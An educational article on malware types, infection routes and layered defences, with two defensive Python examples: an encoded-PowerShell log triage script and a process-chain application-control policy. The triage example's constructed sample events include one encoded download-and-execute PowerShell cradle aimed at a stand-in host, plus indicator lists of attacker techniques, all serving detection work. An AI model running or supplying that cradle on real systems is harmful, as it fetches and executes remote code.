Malware, short for 'malicious software,' refers to any computer software (including firmware, microcode, etc.) created with the purpose of causing harm, such as stealing data or disrupting computers, systems, and other equipment.
Malware is often created by threat actors to:
While malware created years ago can remain dangerous if proper cybersecurity controls are not in place, newer malware types are increasing in sophistication, and even incorporating AI.
You can get malware through various means, primarily by downloading and opening infected files or software from untrustworthy sources. Malware often disguises itself as a legitimate application or file, such as an email attachment or a download from a malicious website. Clicking suspicious links or advertisements can also lead to infection, as they may redirect you to compromised websites.
The most common way to get malware is through phishing emails. Threat actors have become incredibly effective and adept at crafting emails that trick people into clicking on links or downloading files that contain malicious code.
Another frequent way to get malware is through the exploitation of software vulnerabilities. Outdated software and operating systems may have known vulnerabilities that threat actors can exploit to deliver malware to your system, in some cases with no action on your part beyond visiting a web page. Therefore, it's crucial to keep software patched and up to date to minimize risk and shrink the attack surface.
Finally, removable media like USB drives can carry malware. Opening an infected file from the drive (or, on older systems with AutoRun enabled, simply plugging the drive in) can execute the malware and infect your system. It's important to always exercise caution with the files, software, and devices you allow into a trusted environment.
Malware can wreak havoc on computer systems, and the disruptive symptoms it causes are warning signs that a machine may be infected. Being aware of these common symptoms is crucial for early detection and prompt action to safeguard your systems and data.
There are ten main types of malware, which we expand on below.
Worms run independently and spread by exploiting vulnerabilities to deliver a payload and copy themselves onto other systems, typically by scanning the network for susceptible hosts. They may also arrive as attachments or downloads. Worms may consume vast amounts of bandwidth or operate stealthily; depending on their intent, they can take down networks or disable web servers. Self-propagating ransomware such as WannaCry, which spread through an SMBv1 vulnerability without any user interaction, is a form of worm.
A virus is self-replicating malware that attaches itself to a host program or file and spreads when that host is executed or shared; unlike a worm, it generally needs a user (or another program) to run the infected host. The intent of the virus may not be apparent from the initial infection: viruses often lie dormant on a resource until triggered to perform a malicious action, such as spreading to another resource.
Bots are created to perform specific tasks with known, malicious intent. A botnet is a collection of bots that a bot herder commands through command-and-control (C2) infrastructure to carry out coordinated attacks. Botnets can launch attacks at massive scale, such as spam campaigns or Distributed Denial of Service (DDoS) attacks that disrupt websites, networks, or Internet-based services.
A trojan, like the mythical Trojan Horse, relies on disguise. It presents itself as a normal file or application and tricks the user into downloading, opening, or executing it. Its payload can launch any other form of malware while continuing to deceive the user into thinking they are interacting with legitimate software. Many credential-theft attacks, banking trojans for example, are delivered this way.
Ransomware denies access to your files, typically by encrypting them, and demands a ransom (often in cryptocurrency such as Bitcoin) to release the threat actor's grip on your data; many operations now also steal the data first and threaten to publish it. If the ransom is paid and the threat actor is running a functioning operation, they may provide a decryption tool that restores access to the assets. In other cases the payment is made but the threat actor has long since abandoned the scheme, leaving the victim with infected systems and an unrecoverable financial loss. Tested, offline backups remain the most reliable path to recovery.
Adware is designed to display unwanted, and sometimes fraudulent, advertisements to an end user. Clicking the ads often leads to further adware or other malware downloads, redirects to malicious websites, or the launch of an exploit. The goal of adware is to push services in front of the end user and trick them into performing additional steps that load more malware or surveillance software.
Spyware functions by spying on a user's activity: monitoring the screen, capturing keystrokes, and even enabling the device's camera and microphone for surveillance. The collected information is transmitted over the Internet or stored locally for later retrieval by the threat actor, who may use it to hijack accounts or conduct privilege escalation attacks.
Rootkits are malware that maintains privileged (root or administrator-level) access to a computer while hiding its own presence, typically by hooking or modifying the operating system so that the rootkit's files, processes, and network connections are not reported to the user or to security tools. Once active, a rootkit commonly opens a backdoor and may deliver additional malware, such as ransomware, bots, keyloggers, or trojans, to deepen its hold on the machine or support lateral movement across the network.
Fileless malware is an advanced type of malicious software that operates largely in a computer's memory rather than as a conventional executable on disk. By exploiting vulnerabilities and leveraging legitimate processes, it evades file-based detection, making it challenging to identify and eliminate. Note, though, that "fileless" is rarely absolute: persistence usually leaves traces in places such as the registry, WMI subscriptions, or scheduled tasks, and that is where detection efforts should also look. Typically, fileless attacks take advantage of scripting hosts such as PowerShell and other built-in system utilities. Threat actors employ living-off-the-land (LotL) techniques, using legitimate applications already permitted on a system, to bypass allow listing (the binary is trusted) and deny listing (nothing new is written to disk) and carry out normally restricted actions. Advanced persistent threats (APTs) frequently use fileless techniques to remain undetected while stealthily advancing an attack.
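As an added illustration (not code from the original page, and not part of any product), the following Python triages constructed process-creation log events for the encoded-PowerShell pattern described above: it decodes -EncodedCommand arguments (base64 over the UTF-16LE bytes of the script), scans both the raw command line and the decoded script for living-off-the-land indicators, and handles an undecodable payload without crashing. The sample events, the host name and the indicator list are constructed assumptions, and the list is illustrative rather than exhaustive.

```python
import base64
import binascii
import re


def encode_command(script):
    """Encode a script the way 'powershell -EncodedCommand' expects it:
    base64 over the UTF-16LE bytes of the script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation events (Sysmon Event ID 1 / Windows 4688
# style, reduced to the fields this example needs). Made up for the example,
# not taken from a real incident.
SAMPLE_EVENTS = [
    # 1. Routine administration: a script run from disk, nothing encoded.
    {"pid": 1001, "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    # 2. A classic fileless stager: hidden window, no profile, encoded download
    #    cradle that fetches and runs a second stage in memory (host is constructed).
    {"pid": 1002, "cmdline": "powershell.exe -nop -w hidden -enc " + encode_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a.ps1')")},
    # 3. An encoded argument that is not valid base64 (truncated log line or a
    #    broken evasion attempt); the decoder must not crash on it.
    {"pid": 1003, "cmdline": "powershell.exe -EncodedCommand not*valid*base64"},
    # 4. Encoding by itself is not malicious: management tooling encodes benign commands too.
    {"pid": 1004, "cmdline": "powershell.exe -ec " + encode_command("Get-Date")},
]

# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -en, -enc).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Living-off-the-land indicators typical of in-memory stagers (illustrative list).
INDICATORS = [
    r"\bIEX\b", r"Invoke-Expression", r"DownloadString", r"Net\.WebClient",
    r"Invoke-WebRequest", r"FromBase64String", r"-w(?:indowstyle)?\s+hidden", r"-nop\b",
]


def decode_encoded_command(b64):
    """Return the decoded script text, or None if the argument is not well-formed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_command_line(cmdline):
    """Inspect one command line. The decoded payload (if any) is scanned as well,
    so indicators hidden behind -EncodedCommand are still found."""
    result = {"encoded": False, "malformed": False, "decoded": None, "indicators": []}
    text = cmdline
    m = ENC_FLAG.search(cmdline)
    if m:
        result["encoded"] = True
        decoded = decode_encoded_command(m.group(1))
        if decoded is None:
            result["malformed"] = True
        else:
            result["decoded"] = decoded
            text = cmdline + "\n" + decoded
    for pat in INDICATORS:
        if re.search(pat, text, re.IGNORECASE):
            result["indicators"].append(pat)
    return result


def triage(events):
    """Map each event's pid to 'alert' or 'ok'. Encoding alone does not alert;
    encoding plus an indicator, two indicators, or an undecodable payload does."""
    verdicts = {}
    for ev in events:
        r = analyze_command_line(ev["cmdline"])
        suspicious = (r["malformed"]
                      or (r["encoded"] and bool(r["indicators"]))
                      or len(r["indicators"]) >= 2)
        verdicts[ev["pid"]] = "alert" if suspicious else "ok"
    return verdicts


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = analyze_command_line(ev["cmdline"])
        print(ev["pid"], triage([ev])[ev["pid"]], r["indicators"], r["decoded"])
```

Event 1002 alerts on the decoded cradle and the hidden-window flags, 1003 alerts because an encoded argument that cannot be decoded is itself worth a look, and 1001 and 1004 stay quiet, which is the point: encoding is a normal administrative feature and only becomes interesting in combination with other signals. In production this logic sits on top of PowerShell script block logging and AMSI rather than on command lines alone.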
While bugs may not be created with the malicious intent of the other entries on this list, they can cause just as much damage. A bug is a software error, flaw, or failure that arises from poor coding or unexpected operating conditions. Bugs can exist in any type of software, including local applications and websites. When a bug can be leveraged against an application and its data, it is called a vulnerability, and the code used to leverage it is called an exploit.
To effectively prevent malware, businesses must recognize that relying solely on traditional antivirus technology is insufficient. Protecting against the broad range of malware threats requires a blend of proactive and reactive strategies that layer multiple security controls. A defense-in-depth methodology ensures that, even if an attacker bypasses one barrier, such as the perimeter firewall, additional measures are in place to block or contain the breach.
In any area of security, there is no single silver bullet technology that will protect and secure a system. That being said, here are key security disciplines and principles to effectively mitigate malware threats.
Identity security focuses on safeguarding digital identities and access controls so that only authorized individuals can reach sensitive systems and data. Measures include user access management, password policies, multi-factor authentication (MFA), ideally in a phishing-resistant form given that phishing is the most common delivery vector, and identity and access management (IAM) systems that centralize and control user permissions.
Endpoint security entails securing devices, such as mobile devices, laptops, and desktop PCs, and ensuring that those devices comply with certain criteria before they are granted access to network resources. It involves deploying a combination of hardware and software measures to secure these endpoints and prevent unauthorized access, malware infections, data leaks, and other attacks. The goal of endpoint security is to limit the attack surface and safeguard the network from malicious threats (like malware). Important types of endpoint security include antivirus/antimalware, endpoint detection and response (EDR), and endpoint privilege management.
One of the fundamental security principles is to grant each user the minimum access required for their job, known as the principle of least privilege (PoLP). A big challenge in implementing least privilege is managing access over time: just because someone needs access today doesn't mean they'll need it in the future, so removing access when it is no longer necessary is paramount. By implementing PoLP, for example through a privileged access management (PAM) solution, organizations decrease the risk of unauthorized access, limit the harm from insider threats or compromised accounts, and reduce the attack surface available to malicious actors.
Application control can technically be considered a type of endpoint security, but its importance in mitigating malware merits a separate call-out. Threat actors usually focus on exploiting applications to gain prolonged access to a system, injecting or attaching malicious code to key applications; email clients and web browsers are the most common targets. Controlling which applications may run, and what they may do, makes it significantly harder for adversaries to cause harm. By incorporating context, such as which parent process launched an application and which child processes it is allowed to spawn (a word processor or browser has no business starting PowerShell or a command shell), Trusted Application Protection (TAP) provides specialized protection that can help dismantle fileless attacks.
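The following Python is an added example (not the page's code, and not an implementation of any product's Trusted Application Protection) of the child-process context the paragraph describes. A plain allow list is evaluated beside a policy that also inspects the process ancestry, so an interpreter that is legitimately allowed to run, such as PowerShell, is still blocked when a document or browser application appears anywhere in its chain. The executable lists, paths and events are constructed assumptions; a real policy would key on publisher signatures or hashes rather than file names.

```python
import ntpath

# Executables the policy permits to run at all (constructed list, keyed on file
# name only to keep the example short).
ALLOWED = {
    "explorer.exe", "svchost.exe", "winword.exe", "excel.exe", "outlook.exe",
    "chrome.exe", "powershell.exe", "cmd.exe", "wscript.exe", "regsvr32.exe",
}

# Trusted applications that open untrusted content (documents, mail, web pages).
CONTENT_HANDLERS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe"}

# Interpreters and living-off-the-land binaries that a content handler has no
# business launching, even though each is allowed to run on its own.
RESTRICTED_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe",
}


def basename(path):
    # ntpath handles Windows separators regardless of the host OS running this script.
    return ntpath.basename(path).lower()


def allowlist_only(event):
    """Plain allow listing: the decision depends on the image alone."""
    return "allow" if basename(event["image"]) in ALLOWED else "block"


def with_context(event):
    """Allow listing plus process-chain context. Checking the whole chain rather
    than only the direct parent catches 'winword -> cmd -> powershell' laundering."""
    image = basename(event["image"])
    if image not in ALLOWED:
        return "block"
    chain = [basename(p) for p in event["ancestors"]]
    if image in RESTRICTED_CHILDREN and any(a in CONTENT_HANDLERS for a in chain):
        return "block"
    return "allow"


# Constructed paths and events; 'ancestors' runs from the root of the chain to
# the direct parent of 'image'.
EXPLORER = r"C:\Windows\explorer.exe"
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
CMD = r"C:\Windows\System32\cmd.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = {
    "user opens Word": {"image": WINWORD, "ancestors": [EXPLORER]},
    "macro spawns PowerShell": {"image": POWERSHELL, "ancestors": [EXPLORER, WINWORD]},
    "macro launders through cmd": {"image": POWERSHELL, "ancestors": [EXPLORER, WINWORD, CMD]},
    "admin runs PowerShell from the shell": {"image": POWERSHELL, "ancestors": [EXPLORER]},
    "dropped binary": {"image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
                       "ancestors": [EXPLORER, WINWORD]},
}


def evaluate_all(events, policy):
    """Apply one policy function to every named event and return the verdicts."""
    return {name: policy(ev) for name, ev in events.items()}


if __name__ == "__main__":
    for name, ev in SAMPLE_EVENTS.items():
        print(f"{name:38s} allowlist={allowlist_only(ev):5s} with_context={with_context(ev)}")
```

The allow list alone permits both macro-launched PowerShell events, because powershell.exe is a signed, permitted binary; only the context rule blocks them, while the administrator launching PowerShell from the desktop shell is unaffected. The dropped executable is blocked by both policies, which is the case plain allow listing was designed for.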
For devices directly accessible from the Internet while traveling, or companies that have bring your own device (BYOD) policies, authentication often serves as the primary and sole defense. Despite having various security software installed on the system, if a threat actor manages to obtain your password or enterprise credentials, they will gain access to the system. While the least privilege principle can help reduce potential damage, effective control and management of authentication credentials remain essential for keeping adversaries out of the system.
Zero Trust is a security framework that operates under the assumption of no inherent trust in any user or device, whether they are inside or outside the organization's network perimeter. Unlike the traditional approach of granting excessive trust after initial access, Zero Trust follows a "never trust, always verify" mentality. This means continuous authentication, authorization, and monitoring of all network traffic, user activities, and devices are required. Such an approach enables organizations to detect and mitigate potential security threats, even if they originate from within the network. The principle of least privilege is a central piece of a Zero Trust framework.
You may be familiar with the security mantra: prevention is ideal, but detection is a must. We must acknowledge that systems can be compromised, so timely detection is crucial for identifying and halting attacks in progress. To achieve this, deploy hunting and detection that combine behavioral analytics (unusual process chains, script execution, anomalous credential use) with threat intelligence, so that in-progress attacks can be identified and dismantled swiftly.
As malware and other cyber threats continue to evolve and become more sophisticated, for example by incorporating AI-based capabilities, organizations and individuals must adopt robust measures to protect their systems, data, and privacy.
This includes an integrated, defense-in-depth approach that combines endpoint protection with the other security controls described above, together with good cyber hygiene, to mitigate risk and safeguard against breaches.